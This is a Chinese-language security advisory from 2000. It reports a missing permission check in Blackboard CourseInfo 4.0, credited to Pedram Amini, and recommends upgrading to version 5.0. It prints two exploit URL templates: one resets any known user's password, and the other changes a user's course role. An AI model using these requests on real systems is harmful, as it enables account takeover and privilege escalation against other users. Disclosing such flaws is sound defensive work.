发布日期：2000-07-20
更新日期：2000-07-20

受影响系统：

Blackboard CourseInfo 4.0
   - Microsoft Windows NT 4.0

不受影响系统：

  Blackboard CourseInfo 5.0
   - Microsoft Windows NT 4.0
Blackboard CourseInfo for Unix

描述：

---

Blackboard CourseInfo在执行更新数据库操作时缺乏完整的权限检查。任意用户只要有一个合法的
Blackboard CourseInfo账号，就可以利用它的cgi程序修改其他用户的资料信息，包括口令及身份
状态等等。

<* 来源：Pedram Amini <amini@EECS.TULANE.EDU> *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

下列URL可以改变任意已知账号的口令：

http://target/bin/common/user_update_passwd.pl?user_id=<value>&firstname=<value>&lastname=<value>&course_id=<value>&password1=<value>&password2=<value>

下列URL可以改变用户身份状态，比如学生("S"),助教("T"),讲师("G")


http://target/bin/common/user_update_admin.pl?user_id=<value>&course_id=<value>&role=<value>&available_ind=Y



建议：

---

更新到Blackboard CourseInfo 5.0，下载地址：
http://download.blackboard.com

浏览次数：6472
严重程度：0（网友投票）